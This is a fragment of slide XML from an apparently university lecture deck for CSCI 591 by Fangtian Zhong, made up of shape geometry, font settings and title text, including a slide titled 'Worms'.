              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:ea typeface="思源黑体 CN Heavy" panose="020B0A00000000000000" charset="-122"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="思源黑体 CN Normal" panose="020B0400000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9640129" y="6095138"/>
            <a:ext cx="2379149" cy="55308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华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2023.09.21</a:t>
            </a:r>
            <a:endPar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华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4768215" y="3272790"/>
            <a:ext cx="2655570" cy="12452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500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">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rPr>
              <a:t>Fangtian</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">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rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">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rPr>
              <a:t>Zhong</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">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500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="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CSCI </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="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591</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Freeform 159"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="675098" y="1732630"/>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4"/>
          </a:solidFill>
          <a:ln w="1270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5" name="Freeform 159"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2992261" y="1228497"/>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1"/>
          </a:solidFill>
          <a:ln w="1270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11" name="Freeform 159"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1969007" y="4372353"/>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3"/>
          </a:solidFill>
          <a:ln w="1270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17" name="Freeform 298"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11101499" y="3197526"/>
            <a:ext cx="146050" cy="144463"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 123 w 247"/>
              <a:gd name="T1" fmla="*/ 0 h 247"/>
              <a:gd name="T2" fmla="*/ 167 w 247"/>
              <a:gd name="T3" fmla="*/ 80 h 247"/>
              <a:gd name="T4" fmla="*/ 247 w 247"/>
              <a:gd name="T5" fmla="*/ 124 h 247"/>
              <a:gd name="T6" fmla="*/ 167 w 247"/>
              <a:gd name="T7" fmla="*/ 167 h 247"/>
              <a:gd name="T8" fmla="*/ 123 w 247"/>
              <a:gd name="T9" fmla="*/ 247 h 247"/>
              <a:gd name="T10" fmla="*/ 80 w 247"/>
              <a:gd name="T11" fmla="*/ 167 h 247"/>
              <a:gd name="T12" fmla="*/ 0 w 247"/>
              <a:gd name="T13" fmla="*/ 124 h 247"/>
              <a:gd name="T14" fmla="*/ 80 w 247"/>
              <a:gd name="T15" fmla="*/ 80 h 247"/>
              <a:gd name="T16" fmla="*/ 123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23" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="167" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>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18" name="Freeform 302"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11362690" y="1253490"/>
            <a:ext cx="129557" cy="129557"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 75 w 151"/>
              <a:gd name="T1" fmla="*/ 0 h 150"/>
              <a:gd name="T2" fmla="*/ 102 w 151"/>
              <a:gd name="T3" fmla="*/ 48 h 150"/>
              <a:gd name="T4" fmla="*/ 151 w 151"/>
              <a:gd name="T5" fmla="*/ 75 h 150"/>
              <a:gd name="T6" fmla="*/ 102 w 151"/>
              <a:gd name="T7" fmla="*/ 102 h 150"/>
              <a:gd name="T8" fmla="*/ 75 w 151"/>
              <a:gd name="T9" fmla="*/ 150 h 150"/>
              <a:gd name="T10" fmla="*/ 49 w 151"/>
              <a:gd name="T11" fmla="*/ 102 h 150"/>
              <a:gd name="T12" fmla="*/ 0 w 151"/>
              <a:gd name="T13" fmla="*/ 75 h 150"/>
              <a:gd name="T14" fmla="*/ 49 w 151"/>
              <a:gd name="T15" fmla="*/ 48 h 150"/>
              <a:gd name="T16" fmla="*/ 75 w 151"/>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0">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="102" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>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25" name="Freeform 157"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10433905" y="2017746"/>
            <a:ext cx="177215" cy="163925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 55 w 110"/>
              <a:gd name="T1" fmla="*/ 100 h 100"/>
              <a:gd name="T2" fmla="*/ 50 w 110"/>
              <a:gd name="T3" fmla="*/ 97 h 100"/>
              <a:gd name="T4" fmla="*/ 1 w 110"/>
              <a:gd name="T5" fmla="*/ 9 h 100"/>
              <a:gd name="T6" fmla="*/ 1 w 110"/>
              <a:gd name="T7" fmla="*/ 3 h 100"/>
              <a:gd name="T8" fmla="*/ 6 w 110"/>
              <a:gd name="T9" fmla="*/ 0 h 100"/>
              <a:gd name="T10" fmla="*/ 104 w 110"/>
              <a:gd name="T11" fmla="*/ 0 h 100"/>
              <a:gd name="T12" fmla="*/ 109 w 110"/>
              <a:gd name="T13" fmla="*/ 3 h 100"/>
              <a:gd name="T14" fmla="*/ 109 w 110"/>
              <a:gd name="T15" fmla="*/ 9 h 100"/>
              <a:gd name="T16" fmla="*/ 60 w 110"/>
              <a:gd name="T17" fmla="*/ 97 h 100"/>
              <a:gd name="T18" fmla="*/ 55 w 110"/>
              <a:gd name="T19" fmla="*/ 100 h 100"/>
              <a:gd name="T20" fmla="*/ 16 w 110"/>
              <a:gd name="T21" fmla="*/ 12 h 100"/>
              <a:gd name="T22" fmla="*/ 55 w 110"/>
              <a:gd name="T23" fmla="*/ 82 h 100"/>
              <a:gd name="T24" fmla="*/ 94 w 110"/>
              <a:gd name="T25" fmla="*/ 12 h 100"/>
              <a:gd name="T26" fmla="*/ 16 w 110"/>
              <a:gd name="T27" fmla="*/ 1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0">
                <a:moveTo>
                  <a:pt x="55" y="100"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="100"/>
                  <a:pt x="51" y="98"/>
                  <a:pt x="50" y="97"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1" y="9"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="7"/>
                  <a:pt x="0" y="5"/>
                  <a:pt x="1" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2" y="2"/>
                  <a:pt x="4" y="0"/>
                  <a:pt x="6" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="0"/>
                  <a:pt x="108" y="2"/>
                  <a:pt x="109" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="5"/>
                  <a:pt x="110" y="7"/>
                  <a:pt x="109" y="9"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="60" y="97"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="98"/>
                  <a:pt x="57" y="100"/>
                  <a:pt x="55" y="100"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16" y="12"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="55" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="12"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886710" y="4955540"/>
            <a:ext cx="6418580" cy="1139825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150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Gianforte School of Computing </a:t>
            </a:r>
            <a:endPar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en-GB" sz="2200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Norm Asbjornson College of Engineering</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-GB" sz="2200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:sym typeface="+mn-ea"/>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E-mail: fangtian.zhong@montana.edu</a:t>
            </a:r>
            <a:endPar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endPar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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311785" y="46355"/>
            <a:ext cx="2063115" cy="1447165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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1" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2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Worms</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132205" y="1301750"/>
            <a:ext cx="9928225" cy="4780280"/>
            <a:chOff x="998510" y="1183843"/>
            <a:chExt cx="9928225" cy="4780280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 215"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="998510" y="1333068"/>
              <a:ext cx="9928225" cy="4631055"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1245 w 1301"/>
                <a:gd name="T1" fmla="*/ 536 h 536"/>
                <a:gd name="T2" fmla="*/ 56 w 1301"/>
                <a:gd name="T3" fmla="*/ 536 h 536"/>
                <a:gd name="T4" fmla="*/ 0 w 1301"/>
                <a:gd name="T5" fmla="*/ 480 h 536"/>
                <a:gd name="T6" fmla="*/ 0 w 1301"/>
                <a:gd name="T7" fmla="*/ 56 h 536"/>
                <a:gd name="T8" fmla="*/ 56 w 1301"/>
                <a:gd name="T9" fmla="*/ 0 h 536"/>
                <a:gd name="T10" fmla="*/ 119 w 1301"/>
                <a:gd name="T11" fmla="*/ 0 h 536"/>
                <a:gd name="T12" fmla="*/ 119 w 1301"/>
                <a:gd name="T13" fmla="*/ 8 h 536"/>
                <a:gd name="T14" fmla="*/ 56 w 1301"/>
                <a:gd name="T15" fmla="*/ 8 h 536"/>
                <a:gd name="T16" fmla="*/ 8 w 1301"/>
                <a:gd name="T17" fmla="*/ 56 h 536"/>
                <a:gd name="T18" fmla="*/ 8 w 1301"/>
                <a:gd name="T19" fmla="*/ 480 h 536"/>
                <a:gd name="T20" fmla="*/ 56 w 1301"/>
                <a:gd name="T21" fmla="*/ 528 h 536"/>
                <a:gd name="T22" fmla="*/ 1245 w 1301"/>
                <a:gd name="T23" fmla="*/ 528 h 536"/>
                <a:gd name="T24" fmla="*/ 1293 w 1301"/>
                <a:gd name="T25" fmla="*/ 480 h 536"/>
                <a:gd name="T26" fmla="*/ 1293 w 1301"/>
                <a:gd name="T27" fmla="*/ 56 h 536"/>
                <a:gd name="T28" fmla="*/ 1245 w 1301"/>
                <a:gd name="T29" fmla="*/ 8 h 536"/>
                <a:gd name="T30" fmla="*/ 354 w 1301"/>
                <a:gd name="T31" fmla="*/ 8 h 536"/>
                <a:gd name="T32" fmla="*/ 354 w 1301"/>
                <a:gd name="T33" fmla="*/ 0 h 536"/>
                <a:gd name="T34" fmla="*/ 1245 w 1301"/>
                <a:gd name="T35" fmla="*/ 0 h 536"/>
                <a:gd name="T36" fmla="*/ 1301 w 1301"/>
                <a:gd name="T37" fmla="*/ 56 h 536"/>
                <a:gd name="T38" fmla="*/ 1301 w 1301"/>
                <a:gd name="T39" fmla="*/ 480 h 536"/>
                <a:gd name="T40" fmla="*/ 1245 w 1301"/>
                <a:gd name="T41"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1" h="536">
                  <a:moveTo>
                    <a:pt x="1245" y="536"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="536"/>
                    <a:pt x="56" y="536"/>
                    <a:pt x="56" y="536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="536"/>
                    <a:pt x="0" y="511"/>
                    <a:pt x="0" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="56"/>
                    <a:pt x="0" y="56"/>
                    <a:pt x="0" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="25"/>
                    <a:pt x="25" y="0"/>
                    <a:pt x="56" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="0"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="119" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="8"/>
                    <a:pt x="119" y="8"/>
                    <a:pt x="119" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="8"/>
                    <a:pt x="56" y="8"/>
                    <a:pt x="56" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="8"/>
                    <a:pt x="8" y="30"/>
                    <a:pt x="8" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="480"/>
                    <a:pt x="8" y="480"/>
                    <a:pt x="8" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="506"/>
                    <a:pt x="30" y="528"/>
                    <a:pt x="56" y="528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1245" y="528"/>
                    <a:pt x="1245" y="528"/>
                    <a:pt x="1245" y="528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1271" y="528"/>
                    <a:pt x="1293" y="506"/>
                    <a:pt x="1293" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1293" y="56"/>
                    <a:pt x="1293" y="56"/>
                    <a:pt x="1293" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1293" y="30"/>
                    <a:pt x="1271" y="8"/>
                    <a:pt x="1245" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="8"/>
                    <a:pt x="354" y="8"/>
                    <a:pt x="354" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="0"/>
                    <a:pt x="354" y="0"/>
                    <a:pt x="354" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1245" y="0"/>
                    <a:pt x="1245" y="0"/>
                    <a:pt x="1245" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1276" y="0"/>
                    <a:pt x="1301" y="25"/>
                    <a:pt x="1301" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301" y="480"/>
                    <a:pt x="1301" y="480"/>
                    <a:pt x="1301" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301" y="511"/>
                    <a:pt x="1276" y="536"/>
                    <a:pt x="1245" y="536"/>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9" name="Rectangle 216"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1768736" y="1481527"/>
              <a:ext cx="38164" cy="28450"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:pr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1" name="Rectangle 218"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3560379" y="1481527"/>
              <a:ext cx="40940" cy="28450"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:pr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3" name="Freeform 219"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1872127" y="1278214"/>
              <a:ext cx="179719" cy="191517"/>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6 h 28"/>
                <a:gd name="T12" fmla="*/ 6 w 28"/>
                <a:gd name="T13" fmla="*/ 14 h 28"/>
                <a:gd name="T14" fmla="*/ 14 w 28"/>
                <a:gd name="T15" fmla="*/ 22 h 28"/>
                <a:gd name="T16" fmla="*/ 22 w 28"/>
                <a:gd name="T17" fmla="*/ 14 h 28"/>
                <a:gd name="T18" fmla="*/ 14 w 28"/>
                <a:gd name="T19"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6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="6" y="10"/>
                    <a:pt x="6" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="14" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="22"/>
                    <a:pt x="22" y="19"/>
                    <a:pt x="22" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="10"/>
                    <a:pt x="19" y="6"/>
                    <a:pt x="14" y="6"/>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4" name="Freeform 220"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2215606" y="1278214"/>
              <a:ext cx="185271" cy="191517"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 15 w 29"/>
                <a:gd name="T1" fmla="*/ 28 h 28"/>
                <a:gd name="T2" fmla="*/ 0 w 29"/>
                <a:gd name="T3" fmla="*/ 14 h 28"/>
                <a:gd name="T4" fmla="*/ 15 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 28"/>
                <a:gd name="T6" fmla="*/ 29 w 29"/>
                <a:gd name="T7" fmla="*/ 14 h 28"/>
                <a:gd name="T8" fmla="*/ 15 w 29"/>
                <a:gd name="T9" fmla="*/ 28 h 28"/>
                <a:gd name="T10" fmla="*/ 15 w 29"/>
                <a:gd name="T11" fmla="*/ 6 h 28"/>
                <a:gd name="T12" fmla="*/ 7 w 29"/>
                <a:gd name="T13" fmla="*/ 14 h 28"/>
                <a:gd name="T14" fmla="*/ 15 w 29"/>
                <a:gd name="T15" fmla="*/ 22 h 28"/>
                <a:gd name="T16" fmla="*/ 23 w 29"/>
                <a:gd name="T17" fmla="*/ 14 h 28"/>
                <a:gd name="T18" fmla="*/ 15 w 29"/>
                <a:gd name="T19"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28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="28"/>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="6"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="15" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="0"/>
                    <a:pt x="29" y="6"/>
                    <a:pt x="29" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="22"/>
                    <a:pt x="23" y="28"/>
                    <a:pt x="15" y="28"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="15" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="7" y="10"/>
                    <a:pt x="7" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="19"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="15" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="22"/>
                    <a:pt x="23" y="19"/>
                    <a:pt x="23" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="10"/>
                    <a:pt x="19" y="6"/>
                    <a:pt x="15" y="6"/>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5" name="Freeform 221"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2910197" y="1278214"/>
              <a:ext cx="182495" cy="191517"/>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6 h 28"/>
                <a:gd name="T12" fmla="*/ 6 w 28"/>
                <a:gd name="T13" fmla="*/ 14 h 28"/>
                <a:gd name="T14" fmla="*/ 14 w 28"/>
                <a:gd name="T15" fmla="*/ 22 h 28"/>
                <a:gd name="T16" fmla="*/ 22 w 28"/>
                <a:gd name="T17" fmla="*/ 14 h 28"/>
                <a:gd name="T18" fmla="*/ 14 w 28"/>
                <a:gd name="T19"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6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="6" y="10"/>
                    <a:pt x="6" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="14" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="22"/>
                    <a:pt x="22" y="19"/>
                    <a:pt x="22" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="10"/>
                    <a:pt x="18" y="6"/>
                    <a:pt x="14" y="6"/>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6" name="Freeform 222"/>
            <p:cNvSpPr>
